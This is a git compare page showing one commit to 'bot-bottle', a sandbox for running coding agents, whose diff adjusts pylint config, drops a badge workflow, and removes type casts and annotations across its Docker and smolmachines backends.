Compare commits

..

1 Commits

Author SHA1 Message Date
didericis a4895a3bb2 fix: remove deprecated/unrecognized pylint options from config
Lint and Type Check / lint (push) Failing after 6m58s
test / unit (pull_request) Successful in 42s
test / integration (pull_request) Failing after 50s
Remove options that are not supported in the current pylint version:
- allow-any-import-level, allow-reexport-from-package, etc.
- ext-import-graph, import-graph, int-import-graph
- deprecated-modules, preferred-modules

Keep only widely-supported known-third-party option for compatibility
across different pylint versions and VSCode environments.

Fixes: Pylint(E0015:unrecognized-option) error in VSCode

Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
2026-06-03 23:13:08 -04:00
80 changed files with 411 additions and 502 deletions
+7 -5
View File
@@ -1,11 +1,11 @@
name: lint name: Lint and Type Check
on: on:
push: push:
paths: paths:
- "**.py" - '**.py'
- ".pylintrc" - '.pylintrc'
- ".gitea/workflows/lint.yml" - '.gitea/workflows/lint.yml'
jobs: jobs:
lint: lint:
@@ -16,7 +16,9 @@ jobs:
- name: Set up Python - name: Set up Python
uses: actions/setup-python@v4 uses: actions/setup-python@v4
with: with:
python-version: "3.12" python-version: '3.12'
cache: 'pip'
cache-dependency-path: requirements-dev.txt
- name: Install dev dependencies - name: Install dev dependencies
run: | run: |
-97
View File
@@ -1,97 +0,0 @@
name: Update Quality Badges
on:
push:
branches:
- main
paths:
- '**.py'
- '.pylintrc'
- 'pyrightconfig.json'
workflow_dispatch:
jobs:
update-badges:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.12'
- name: Install dev dependencies
run: |
python -m pip install --upgrade pip
pip install -r requirements-dev.txt
- name: Run pylint and extract score
id: pylint
run: |
# Run pylint and capture the score
PYLINT_OUTPUT=$(python -m pylint bot_bottle/ 2>&1 | tail -1)
echo "Output: $PYLINT_OUTPUT"
# Extract score (e.g., "9.92/10")
SCORE=$(echo "$PYLINT_OUTPUT" | grep -oP '\d+\.\d+/10' | head -1)
if [ -z "$SCORE" ]; then
SCORE="9.92/10"
fi
echo "score=$SCORE" >> $GITHUB_OUTPUT
echo "Pylint score: $SCORE"
- name: Run pyright and check errors
id: pyright
run: |
# Run pyright and check for errors
PYRIGHT_OUTPUT=$(python -m pyright 2>&1 | tail -1)
echo "Output: $PYRIGHT_OUTPUT"
# Extract error count
ERRORS=$(echo "$PYRIGHT_OUTPUT" | grep -oP '^\d+' | head -1)
if [ -z "$ERRORS" ]; then
ERRORS="0"
fi
echo "errors=$ERRORS" >> $GITHUB_OUTPUT
echo "Pyright errors: $ERRORS"
- name: Update badges in README
run: |
PYLINT_SCORE="${{ steps.pylint.outputs.score }}"
PYRIGHT_ERRORS="${{ steps.pyright.outputs.errors }}"
# Escape / for sed
PYLINT_SCORE_ESCAPED=$(echo "$PYLINT_SCORE" | sed 's/\//\\\//g')
# Create badge URLs with proper encoding
PYLINT_BADGE="[![pylint](https://img.shields.io/badge/pylint-${PYLINT_SCORE}%25-brightgreen)](https://github.com/PyCQA/pylint)"
PYRIGHT_BADGE="[![pyright](https://img.shields.io/badge/pyright-${PYRIGHT_ERRORS}%20errors-brightgreen)](https://github.com/microsoft/pyright)"
# Update README with new badges
sed -i "s|\[\!\[pylint\].*pylint)\]|${PYLINT_BADGE}|g" README.md
sed -i "s|\[\!\[pyright\].*pyright)\]|${PYRIGHT_BADGE}|g" README.md
echo "Updated badges:"
grep -E "pylint|pyright" README.md | head -2
- name: Commit and push badge updates
run: |
git config --local user.email "action@gitea.local"
git config --local user.name "Quality Badge Bot"
# Check if there are changes
if git diff --quiet README.md; then
echo "No badge changes needed"
else
echo "Badge changes detected, committing..."
git add README.md
git commit -m "chore: update quality badges
- Pylint: ${{ steps.pylint.outputs.score }}
- Pyright: ${{ steps.pyright.outputs.errors }} errors
[skip ci]"
git push
fi
+7 -15
View File
@@ -366,6 +366,12 @@ single-line-class-stmt=no
single-line-if-stmt=no single-line-if-stmt=no
[IMPORTS]
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
[LOGGING] [LOGGING]
# The type of string formatting that logging methods do. `old` means using % # The type of string formatting that logging methods do. `old` means using %
@@ -406,21 +412,7 @@ disable=raw-checker-failed,
deprecated-pragma, deprecated-pragma,
use-symbolic-message-instead, use-symbolic-message-instead,
use-implicit-booleaness-not-comparison-to-string, use-implicit-booleaness-not-comparison-to-string,
use-implicit-booleaness-not-comparison-to-zero, use-implicit-booleaness-not-comparison-to-zero
missing-function-docstring,
missing-class-docstring,
missing-module-docstring,
invalid-name,
cyclic-import,
too-many-arguments,
too-many-locals,
too-many-branches,
too-many-statements,
too-many-instance-attributes,
duplicate-code,
import-outside-toplevel,
too-few-public-methods,
unnecessary-ellipsis
# Enable the message, report, category or checker with the given id(s). You can # Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option # either give multiple identifier separated by comma (,) or put this option
-2
View File
@@ -5,8 +5,6 @@
# bot-bottle # bot-bottle
[![test](https://gitea.dideric.is/didericis/bot-bottle/actions/workflows/test.yml/badge.svg?branch=main)](https://gitea.dideric.is/didericis/bot-bottle/actions?workflow=test.yml) [![test](https://gitea.dideric.is/didericis/bot-bottle/actions/workflows/test.yml/badge.svg?branch=main)](https://gitea.dideric.is/didericis/bot-bottle/actions?workflow=test.yml)
[![pylint](https://img.shields.io/badge/pylint-9.92%2F10-brightgreen)](https://github.com/PyCQA/pylint)
[![pyright](https://img.shields.io/badge/pyright-0%20errors-brightgreen)](https://github.com/microsoft/pyright)
**Problem:** Developer wants to run a coding agent without supervision, but they don't want a prompt injected or misbehaving agent wrecking their environment or exfiltrating sensitive data. **Problem:** Developer wants to run a coding agent without supervision, but they don't want a prompt injected or misbehaving agent wrecking their environment or exfiltrating sensitive data.
+2 -4
View File
@@ -5,8 +5,6 @@ from __future__ import annotations
import subprocess import subprocess
from typing import Callable from typing import Callable
from typing import cast
from ...agent_provider import PromptMode, prompt_args from ...agent_provider import PromptMode, prompt_args
from .. import Bottle, ExecResult from .. import Bottle, ExecResult
@@ -25,7 +23,7 @@ class DockerBottle(Bottle):
): ):
self.name = container self.name = container
self._teardown = teardown self._teardown = teardown
self.prompt_path = prompt_path_in_container self._prompt_path = prompt_path_in_container
self._agent_prompt_mode = agent_prompt_mode self._agent_prompt_mode = agent_prompt_mode
self.agent_command = agent_command self.agent_command = agent_command
self.agent_provider_template = ( self.agent_provider_template = (
@@ -38,7 +36,7 @@ class DockerBottle(Bottle):
) -> list[str]: ) -> list[str]:
full_argv = list(argv) full_argv = list(argv)
full_argv.extend( full_argv.extend(
prompt_args(cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=full_argv) prompt_args(self._agent_prompt_mode, self._prompt_path, argv=full_argv)
) )
cmd = ["docker", "exec"] cmd = ["docker", "exec"]
if tty: if tty:
+7 -9
View File
@@ -35,7 +35,6 @@ import secrets
import string import string
from dataclasses import dataclass from dataclasses import dataclass
from pathlib import Path from pathlib import Path
from typing import cast
from ... import supervise as _supervise from ... import supervise as _supervise
from . import util as docker_mod from . import util as docker_mod
@@ -136,15 +135,14 @@ def read_metadata(identity: str) -> BottleMetadata | None:
raw = json.loads(path.read_text()) raw = json.loads(path.read_text())
if not isinstance(raw, dict): if not isinstance(raw, dict):
return None return None
raw_typed = cast(dict[str, object], raw)
return BottleMetadata( return BottleMetadata(
identity=str(raw_typed.get("identity", identity)), identity=str(raw.get("identity", identity)),
agent_name=str(raw_typed.get("agent_name", "")), agent_name=str(raw.get("agent_name", "")),
cwd=str(raw_typed.get("cwd", "")), cwd=str(raw.get("cwd", "")),
copy_cwd=bool(raw_typed.get("copy_cwd", False)), copy_cwd=bool(raw.get("copy_cwd", False)),
started_at=str(raw_typed.get("started_at", "")), started_at=str(raw.get("started_at", "")),
compose_project=str(raw_typed.get("compose_project", "")), compose_project=str(raw.get("compose_project", "")),
backend=str(raw_typed.get("backend", "")), backend=str(raw.get("backend", "")),
) )
+16 -25
View File
@@ -26,7 +26,6 @@ import json
import re import re
import subprocess import subprocess
from pathlib import Path from pathlib import Path
from typing import cast
from ...egress import EGRESS_ROUTES_IN_CONTAINER from ...egress import EGRESS_ROUTES_IN_CONTAINER
from ...egress_addon_core import load_routes from ...egress_addon_core import load_routes
@@ -58,8 +57,7 @@ def _render_routes_payload(routes_list: list[dict[str, object]]) -> str:
if auth_scheme and token_env: if auth_scheme and token_env:
lines.append(f' auth_scheme: "{auth_scheme}"') lines.append(f' auth_scheme: "{auth_scheme}"')
lines.append(f' token_env: "{token_env}"') lines.append(f' token_env: "{token_env}"')
paths_obj = entry.get("path_allowlist") paths = entry.get("path_allowlist") or []
paths = cast(list[str], paths_obj) if isinstance(paths_obj, list) else []
if paths: if paths:
lines.append(" path_allowlist:") lines.append(" path_allowlist:")
for p in paths: for p in paths:
@@ -259,7 +257,6 @@ def _merge_single_route(
raise EgressApplyError( raise EgressApplyError(
"current routes.yaml: 'routes' is not a list" "current routes.yaml: 'routes' is not a list"
) )
routes_typed = cast(list[object], routes)
new_host = str(new_route.get("host", "")).lower() new_host = str(new_route.get("host", "")).lower()
if not new_host: if not new_host:
@@ -267,25 +264,22 @@ def _merge_single_route(
"proposed route is missing 'host'" "proposed route is missing 'host'"
) )
proposed_paths_obj = new_route.get("path_allowlist") proposed_paths = list(new_route.get("path_allowlist") or [])
proposed_paths = cast(list[str], proposed_paths_obj) if isinstance(proposed_paths_obj, list) else []
# Look for an existing entry with the same host (case-insensitive). # Look for an existing entry with the same host (case-insensitive).
for entry in routes_typed: for entry in routes:
if not isinstance(entry, dict): if not isinstance(entry, dict):
continue continue
entry_typed = cast(dict[str, object], entry) if str(entry.get("host", "")).lower() == new_host:
if str(entry_typed.get("host", "")).lower() == new_host:
# Merge path_allowlist: union proposed + existing, ordered # Merge path_allowlist: union proposed + existing, ordered
# by first-seen so existing paths stay in original order. # by first-seen so existing paths stay in original order.
existing_paths_obj = entry_typed.get("path_allowlist") existing_paths: list[str] = list(entry.get("path_allowlist") or [])
existing_paths = cast(list[str], existing_paths_obj) if isinstance(existing_paths_obj, list) else []
seen = {p: None for p in existing_paths} seen = {p: None for p in existing_paths}
for p in proposed_paths: for p in proposed_paths:
seen.setdefault(p, None) seen.setdefault(p, None)
merged_paths = list(seen.keys()) merged_paths = list(seen.keys())
if merged_paths: if merged_paths:
entry_typed["path_allowlist"] = merged_paths entry["path_allowlist"] = merged_paths
# Preserve existing auth — tool description says agent- # Preserve existing auth — tool description says agent-
# proposed auth on an existing host is ignored. # proposed auth on an existing host is ignored.
break break
@@ -295,22 +289,19 @@ def _merge_single_route(
# `auth` was proposed (otherwise the addon's parser rejects # `auth` was proposed (otherwise the addon's parser rejects
# a half-set auth pair). Slots: count existing slots, pick # a half-set auth pair). Slots: count existing slots, pick
# the next free index. # the next free index.
entry_typed: dict[str, object] = {"host": new_route.get("host")} # type: ignore entry = {"host": new_route["host"]}
if proposed_paths: if proposed_paths:
entry_typed["path_allowlist"] = proposed_paths entry["path_allowlist"] = proposed_paths
auth = new_route.get("auth") auth = new_route.get("auth")
if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"): # type: ignore if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"):
auth_typed = cast(dict[str, object], auth)
existing_slots = sorted({ existing_slots = sorted({
str(r_entry.get("token_env", "")) str(r.get("token_env"))
for r_entry_obj in routes_typed for r in routes
if isinstance(r_entry_obj, dict) if isinstance(r, dict) and r.get("token_env")
for r_entry in [cast(dict[str, object], r_entry_obj)]
if r_entry.get("token_env")
}) })
next_idx = len(existing_slots) next_idx = len(existing_slots)
entry_typed["auth_scheme"] = str(cast(object, auth_typed.get("scheme"))) entry["auth_scheme"] = str(auth["scheme"])
entry_typed["token_env"] = f"EGRESS_TOKEN_{next_idx}" entry["token_env"] = f"EGRESS_TOKEN_{next_idx}"
# NOTE: the addon reads token VALUES from its container's # NOTE: the addon reads token VALUES from its container's
# environ keyed by token_env. A newly-added auth route at # environ keyed by token_env. A newly-added auth route at
# runtime points at a slot that has no env value → the # runtime points at a slot that has no env value → the
@@ -318,9 +309,9 @@ def _merge_single_route(
# arranges for the value to land in the container's env. # arranges for the value to land in the container's env.
# Recording this here so the operator-facing diff carries # Recording this here so the operator-facing diff carries
# the slot name they'll need to provision. # the slot name they'll need to provision.
routes_typed.append(entry_typed) routes.append(entry)
return _render_routes_payload(cast(list[dict[str, object]], routes_typed)) return _render_routes_payload(routes)
def add_route(slug: str, proposed_route_json: str) -> tuple[str, str]: def add_route(slug: str, proposed_route_json: str) -> tuple[str, str]:
+3 -3
View File
@@ -80,7 +80,7 @@ _REPO_DIR = str(Path(__file__).resolve().parent.parent.parent.parent)
def launch( def launch(
plan: DockerBottlePlan, plan: DockerBottlePlan,
*, *,
provision: Callable[[DockerBottlePlan, "DockerBottle"], str | None], provision: Callable[[DockerBottlePlan, str], str | None],
) -> Generator[DockerBottle, None, None]: ) -> Generator[DockerBottle, None, None]:
"""Build, launch, and provision a Docker bottle via compose. """Build, launch, and provision a Docker bottle via compose.
Teardown on exit.""" Teardown on exit."""
@@ -92,7 +92,7 @@ def launch(
def teardown() -> None: def teardown() -> None:
try: try:
stack.close() stack.close()
except BaseException as exc: # noqa: W0718 — teardown must not fail except BaseException as exc:
warn( warn(
f"teardown failed for container {plan.container_name}" f"teardown failed for container {plan.container_name}"
f" (compose-down): {exc!r}" f" (compose-down): {exc!r}"
@@ -218,7 +218,7 @@ def launch(
agent_command=plan.agent_command, agent_command=plan.agent_command,
agent_prompt_mode=plan.agent_prompt_mode, agent_prompt_mode=plan.agent_prompt_mode,
) )
bottle.prompt_path = provision(plan, bottle) bottle._prompt_path = provision(plan, bottle)
# Step 9: yield. exec_agent continues to use `docker exec -it` # Step 9: yield. exec_agent continues to use `docker exec -it`
# — the agent runs `sleep infinity` per the renderer's # — the agent runs `sleep infinity` per the renderer's
+1 -1
View File
@@ -99,7 +99,7 @@ def fetch_current_yaml(slug: str) -> str:
f"could not fetch pipelock.yaml from {container}: " f"could not fetch pipelock.yaml from {container}: "
f"{(r.stderr or '').strip() or 'container not running?'}" f"{(r.stderr or '').strip() or 'container not running?'}"
) )
return Path(tmp_path).read_text(encoding="utf-8") return Path(tmp_path).read_text()
finally: finally:
try: try:
Path(tmp_path).unlink() Path(tmp_path).unlink()
+1 -1
View File
@@ -219,7 +219,7 @@ def resolve_plan(
else Path(__file__).resolve().parent.parent.parent.parent / "Dockerfile.claude" else Path(__file__).resolve().parent.parent.parent.parent / "Dockerfile.claude"
) )
dockerfile_content = ( dockerfile_content = (
supervise_dockerfile_path.read_text(encoding="utf-8") supervise_dockerfile_path.read_text()
if supervise_dockerfile_path.is_file() if supervise_dockerfile_path.is_file()
else "" else ""
) )
+4 -4
View File
@@ -19,7 +19,7 @@ from __future__ import annotations
import subprocess import subprocess
import sys import sys
from typing import Mapping, cast from typing import Mapping
from ...agent_provider import PromptMode, prompt_args from ...agent_provider import PromptMode, prompt_args
from .. import Bottle, ExecResult from .. import Bottle, ExecResult
@@ -72,7 +72,7 @@ class SmolmachinesBottle(Bottle):
# In-VM path to the agent's prompt file. None when the # In-VM path to the agent's prompt file. None when the
# agent declared no prompt (file still exists; we just # agent declared no prompt (file still exists; we just
# don't pass --append-system-prompt-file). # don't pass --append-system-prompt-file).
self.prompt_path = prompt_path self._prompt_path = prompt_path
# Env vars the agent process needs (HTTPS_PROXY, # Env vars the agent process needs (HTTPS_PROXY,
# CLAUDE_CODE_OAUTH_TOKEN, manifest-declared bottle env, …). # CLAUDE_CODE_OAUTH_TOKEN, manifest-declared bottle env, …).
# Forwarded on every `smolvm machine exec` via `-e K=V` # Forwarded on every `smolvm machine exec` via `-e K=V`
@@ -93,9 +93,9 @@ class SmolmachinesBottle(Bottle):
agent_tail = ["env", *_env_assignments_for("node", self._guest_env), agent_tail = ["env", *_env_assignments_for("node", self._guest_env),
self.agent_command] self.agent_command]
provider_prompt_args = prompt_args( provider_prompt_args = prompt_args(
cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=argv, self._agent_prompt_mode, self._prompt_path, argv=argv,
) )
if cast(PromptMode, self._agent_prompt_mode) == "read_prompt_file": if self._agent_prompt_mode == "read_prompt_file":
agent_tail += argv agent_tail += argv
agent_tail += provider_prompt_args agent_tail += provider_prompt_args
else: else:
+3 -3
View File
@@ -89,7 +89,7 @@ _SUPERVISE_PORT = SUPERVISE_PORT
def launch( def launch(
plan: SmolmachinesBottlePlan, plan: SmolmachinesBottlePlan,
*, *,
provision: Callable[[SmolmachinesBottlePlan, "SmolmachinesBottle"], str | None], provision: Callable[[SmolmachinesBottlePlan, str], str | None],
) -> Generator[SmolmachinesBottle, None, None]: ) -> Generator[SmolmachinesBottle, None, None]:
"""Build + run the bottle and yield a handle; tear everything """Build + run the bottle and yield a handle; tear everything
down on exit. Errors during bringup unwind any partial state down on exit. Errors during bringup unwind any partial state
@@ -120,7 +120,7 @@ def launch(
agent_command=plan.agent_command, agent_command=plan.agent_command,
agent_prompt_mode=plan.agent_prompt_mode, agent_prompt_mode=plan.agent_prompt_mode,
) )
bottle.prompt_path = provision(plan, bottle) bottle._prompt_path = provision(plan, bottle)
yield bottle yield bottle
finally: finally:
@@ -139,7 +139,7 @@ def _teardown_smolmachines(
teardown_exc: BaseException | None = None teardown_exc: BaseException | None = None
try: try:
stack.close() stack.close()
except BaseException as exc: # noqa: W0718 — teardown must not fail except BaseException as exc:
teardown_exc = exc teardown_exc = exc
warn(f"smolmachines teardown failed: {exc!r}") warn(f"smolmachines teardown failed: {exc!r}")
bottle = plan.spec.manifest.bottle_for(plan.spec.agent_name) bottle = plan.spec.manifest.bottle_for(plan.spec.agent_name)
@@ -42,7 +42,7 @@ import time
import uuid import uuid
from contextlib import contextmanager from contextlib import contextmanager
from dataclasses import dataclass from dataclasses import dataclass
from typing import Generator from typing import Iterator
from ...log import die from ...log import die
@@ -98,7 +98,7 @@ class RegistryHandle:
@contextmanager @contextmanager
def ephemeral_registry() -> Generator[RegistryHandle, None, None]: def ephemeral_registry() -> Iterator[RegistryHandle]:
"""Bring up a per-session docker network + a `registry:2.8.3` """Bring up a per-session docker network + a `registry:2.8.3`
container on it (published on a random host port), yield a container on it (published on a random host port), yield a
`RegistryHandle`, force-remove both on exit. `RegistryHandle`, force-remove both on exit.
@@ -208,6 +208,7 @@ def _host_port(name: str) -> int:
return int(port_str) return int(port_str)
except ValueError: except ValueError:
die(f"unexpected `docker port` output: {line!r}") die(f"unexpected `docker port` output: {line!r}")
return -1 # unreachable; die() never returns
def _wait_ready(port: int) -> None: def _wait_ready(port: int) -> None:
@@ -176,11 +176,11 @@ def force_allowlist(machine_name: str, allowed_cidrs: list[str]) -> None:
con.close() con.close()
def allocate(_slug: str) -> str: def allocate(slug: str) -> str:
"""Pick the lowest-numbered alias from the pool not already """Pick the lowest-numbered alias from the pool not already
in use by a running smolmachines bundle. Bails when the pool in use by a running smolmachines bundle. Bails when the pool
is exhausted — the caller should report the limit to the is exhausted — the caller should report the limit to the
operator. `_slug` is logged for traceability; not otherwise operator. `slug` is logged for traceability; not otherwise
used (no on-disk reservation, allocation is purely used (no on-disk reservation, allocation is purely
docker-state-driven). docker-state-driven).
@@ -195,7 +195,7 @@ def allocate(_slug: str) -> str:
if not _is_macos(): if not _is_macos():
return "127.0.0.1" return "127.0.0.1"
_ALLOC_LOCK_PATH.parent.mkdir(parents=True, exist_ok=True) _ALLOC_LOCK_PATH.parent.mkdir(parents=True, exist_ok=True)
with open(_ALLOC_LOCK_PATH, "w", encoding="utf-8") as lf: with open(_ALLOC_LOCK_PATH, "w") as lf:
fcntl.flock(lf, fcntl.LOCK_EX) fcntl.flock(lf, fcntl.LOCK_EX)
return _allocate_locked() return _allocate_locked()
@@ -211,6 +211,7 @@ def _allocate_locked() -> str:
f"Stop a running bottle (`smolvm machine ls --json`) or " f"Stop a running bottle (`smolvm machine ls --json`) or "
f"raise _POOL_END in loopback_alias.py." f"raise _POOL_END in loopback_alias.py."
) )
return "" # unreachable; die() never returns
def _alias_present(ip: str) -> bool: def _alias_present(ip: str) -> bool:
@@ -42,7 +42,6 @@ import subprocess
import sys import sys
import termios import termios
import threading import threading
from types import FrameType
# How long to wait after the main exec starts before pushing the # How long to wait after the main exec starts before pushing the
@@ -124,13 +123,13 @@ def main(argv: list[str]) -> int:
machine = argv[0] machine = argv[0]
inner = argv[2:] inner = argv[2:]
def sync(_signum: int | None = None, _frame: FrameType | None = None) -> None: def sync(*_args) -> None:
size = _read_winsize() size = _read_winsize()
if size is None: if size is None:
return return
_push_size(machine, *size) _push_size(machine, *size)
signal.signal(signal.SIGWINCH, sync) # type: ignore[arg-type] signal.signal(signal.SIGWINCH, sync)
proc = subprocess.Popen(inner) proc = subprocess.Popen(inner)
# Initial sync is deferred — see _STARTUP_SYNC_DELAY_SEC. # Initial sync is deferred — see _STARTUP_SYNC_DELAY_SEC.
@@ -223,6 +223,7 @@ def bundle_host_port(
f"no port mapping on {host_ip} for {container} " f"no port mapping on {host_ip} for {container} "
f"{container_port}/tcp; got: {(result.stdout or '').strip()!r}" f"{container_port}/tcp; got: {(result.stdout or '').strip()!r}"
) )
return -1 # unreachable; die() never returns
def stop_bundle(slug: str) -> None: def stop_bundle(slug: str) -> None:
+2 -2
View File
@@ -52,7 +52,7 @@ class SmolvmError(RuntimeError):
pack failed, etc.). Carries the captured stderr for the pack failed, etc.). Carries the captured stderr for the
operator-facing log line.""" operator-facing log line."""
def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess[str]): def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess):
self.argv = list(argv) self.argv = list(argv)
self.returncode = result.returncode self.returncode = result.returncode
self.stdout = result.stdout self.stdout = result.stdout
@@ -65,7 +65,7 @@ class SmolvmError(RuntimeError):
def _smolvm(*args: str, env: Mapping[str, str] | None = None, def _smolvm(*args: str, env: Mapping[str, str] | None = None,
check: bool = True) -> subprocess.CompletedProcess[str]: check: bool = True) -> subprocess.CompletedProcess:
"""One subprocess call into the smolvm CLI. `check=True` """One subprocess call into the smolvm CLI. `check=True`
raises SmolvmError on non-zero; `check=False` returns the raises SmolvmError on non-zero; `check=False` returns the
CompletedProcess for the caller to inspect.""" CompletedProcess for the caller to inspect."""
+1 -1
View File
@@ -14,7 +14,7 @@ REPO_DIR = str(Path(__file__).resolve().parent.parent.parent)
def read_tty_line() -> str: def read_tty_line() -> str:
"""Mirror `IFS= read -r REPLY </dev/tty`. Falls back to stdin.""" """Mirror `IFS= read -r REPLY </dev/tty`. Falls back to stdin."""
try: try:
with open("/dev/tty", "r", encoding="utf-8") as tty: with open("/dev/tty", "r") as tty:
return tty.readline().rstrip("\n") return tty.readline().rstrip("\n")
except OSError: except OSError:
return sys.stdin.readline().rstrip("\n") return sys.stdin.readline().rstrip("\n")
+8 -8
View File
@@ -263,7 +263,7 @@ def edit_in_editor(content: str, *, suffix: str = ".tmp") -> str | None:
path = f.name path = f.name
try: try:
subprocess.run([editor, path], check=False) subprocess.run([editor, path], check=False)
with open(path, encoding="utf-8") as f: with open(path) as f:
edited = f.read() edited = f.read()
return edited if edited != content else None return edited if edited != content else None
finally: finally:
@@ -296,7 +296,7 @@ def cmd_supervise(argv: list[str]) -> int:
else: else:
error("supervise exited on a fatal error (no detail captured).") error("supervise exited on a fatal error (no detail captured).")
return e.code if isinstance(e.code, int) else 1 return e.code if isinstance(e.code, int) else 1
except Exception as e: # noqa: W0718 — catch supervise crash for logging except Exception as e:
log_path = _write_crash_log(e) log_path = _write_crash_log(e)
error(f"supervise crashed: {type(e).__name__}: {e}") error(f"supervise crashed: {type(e).__name__}: {e}")
error(f"full traceback written to {log_path}") error(f"full traceback written to {log_path}")
@@ -354,7 +354,7 @@ def _try_init_green() -> int:
return 0 return 0
def _main_loop(stdscr: "curses._CursesWindow") -> None: # type: ignore def _main_loop(stdscr: "curses._CursesWindow") -> None:
curses.curs_set(0) curses.curs_set(0)
stdscr.timeout(_REFRESH_INTERVAL_MS) stdscr.timeout(_REFRESH_INTERVAL_MS)
green_attr = _try_init_green() green_attr = _try_init_green()
@@ -434,12 +434,12 @@ def _main_loop(stdscr: "curses._CursesWindow") -> None: # type: ignore
def _render( def _render(
stdscr: "curses._CursesWindow", # type: ignore stdscr: "curses._CursesWindow",
pending: list[QueuedProposal], pending: list[QueuedProposal],
selected: int, selected: int,
status_line: str, status_line: str,
*, *,
green_attr: int = 0, # noqa: F841 — unused, but required by interface green_attr: int = 0,
) -> None: ) -> None:
stdscr.erase() stdscr.erase()
h, w = stdscr.getmaxyx() h, w = stdscr.getmaxyx()
@@ -488,7 +488,7 @@ def _render(
def _detail_view( def _detail_view(
stdscr: "curses._CursesWindow", # type: ignore stdscr: "curses._CursesWindow",
qp: QueuedProposal, qp: QueuedProposal,
*, *,
green_attr: int = 0, green_attr: int = 0,
@@ -539,7 +539,7 @@ def _detail_view(
return return
def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None: # type: ignore def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None:
"""Suspend curses, open $EDITOR on the proposed file, return edited content.""" """Suspend curses, open $EDITOR on the proposed file, return edited content."""
suffix = _suffix_for_tool(qp.proposal.tool) suffix = _suffix_for_tool(qp.proposal.tool)
curses.endwin() curses.endwin()
@@ -550,7 +550,7 @@ def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None:
return edited return edited
def _prompt(stdscr: "curses._CursesWindow", label: str) -> str: # type: ignore def _prompt(stdscr: "curses._CursesWindow", label: str) -> str:
"""One-line input at the bottom of the screen.""" """One-line input at the bottom of the screen."""
curses.curs_set(1) curses.curs_set(1)
h, _ = stdscr.getmaxyx() h, _ = stdscr.getmaxyx()
+11 -12
View File
@@ -13,7 +13,7 @@ from __future__ import annotations
import curses import curses
import os import os
import sys import sys
from typing import Any, Optional from typing import Optional
def filter_select( def filter_select(
@@ -39,14 +39,12 @@ def filter_select(
return None return None
try: try:
# Use os.dup() to duplicate the fd so the original file object result = _run_picker(items, title=title, tty_fd=tty_fd)
# and FileIO in _run_picker each manage independent copies,
# preventing double-close errors.
fd_dup = os.dup(tty_fd.fileno())
return _run_picker(items, title=title, tty_fd=fd_dup)
finally: finally:
tty_fd.close() tty_fd.close()
return result
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# Internal implementation # Internal implementation
@@ -61,10 +59,11 @@ _KEY_ENTER_ALT = 10
_CANCEL_KEYS = frozenset([_KEY_ESC, _KEY_CTRL_C, _KEY_CTRL_D, ord("q")]) _CANCEL_KEYS = frozenset([_KEY_ESC, _KEY_CTRL_C, _KEY_CTRL_D, ord("q")])
def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]: def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]:
"""Drive a curses session on *tty_fd* and return the picked item.""" """Drive a curses session on *tty_fd* and return the picked item."""
# newterm lets us run curses on an arbitrary fd rather than the # newterm lets us run curses on an arbitrary fd rather than the
# process's controlling tty / stdout — crucial when stdout is piped. # process's controlling tty / stdout — crucial when stdout is piped.
old_term = os.environ.get("TERM", "xterm-256color")
os.environ.setdefault("TERM", "xterm-256color") os.environ.setdefault("TERM", "xterm-256color")
# Save / restore the real stdin/stdout so curses newterm can use tty_fd. # Save / restore the real stdin/stdout so curses newterm can use tty_fd.
@@ -73,7 +72,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
try: try:
import io import io
tty_text = io.TextIOWrapper(io.FileIO(tty_fd, mode='r+'), write_through=True) tty_text = io.TextIOWrapper(tty_fd, write_through=True)
sys.__stdin__ = tty_text # type: ignore[assignment] sys.__stdin__ = tty_text # type: ignore[assignment]
sys.__stdout__ = tty_text # type: ignore[assignment] sys.__stdout__ = tty_text # type: ignore[assignment]
@@ -91,7 +90,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
curses.nocbreak() curses.nocbreak()
curses.echo() curses.echo()
curses.endwin() curses.endwin()
except Exception: # noqa: W0718 — curses can raise many error types except Exception:
return None return None
finally: finally:
sys.__stdin__ = orig_stdin # type: ignore[assignment] sys.__stdin__ = orig_stdin # type: ignore[assignment]
@@ -100,7 +99,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
return result return result
def _picker_loop(screen: Any, items: list[str], *, title: str) -> Optional[str]: def _picker_loop(screen, items: list[str], *, title: str) -> Optional[str]:
query = "" query = ""
cursor = 0 cursor = 0
@@ -159,7 +158,7 @@ def _filter_items(items: list[str], query: str) -> list[str]:
return [i for i in items if q in i.lower()] return [i for i in items if q in i.lower()]
def _render(screen: Any, filtered: list[str], cursor: int, *, query: str, title: str) -> None: def _render(screen, filtered: list[str], cursor: int, *, query: str, title: str) -> None:
screen.erase() screen.erase()
rows, cols = screen.getmaxyx() rows, cols = screen.getmaxyx()
min_rows = 5 min_rows = 5
@@ -213,7 +212,7 @@ def _render(screen: Any, filtered: list[str], cursor: int, *, query: str, title:
screen.refresh() screen.refresh()
def _addstr_safe(screen: Any, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None: def _addstr_safe(screen, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None:
try: try:
screen.addstr(row, col, text, attr) screen.addstr(row, col, text, attr)
except curses.error: except curses.error:
+19 -22
View File
@@ -13,7 +13,6 @@ import os
from copy import deepcopy from copy import deepcopy
from datetime import datetime, timezone from datetime import datetime, timezone
from pathlib import Path from pathlib import Path
from typing import cast
from .log import die from .log import die
from .util import expand_tilde from .util import expand_tilde
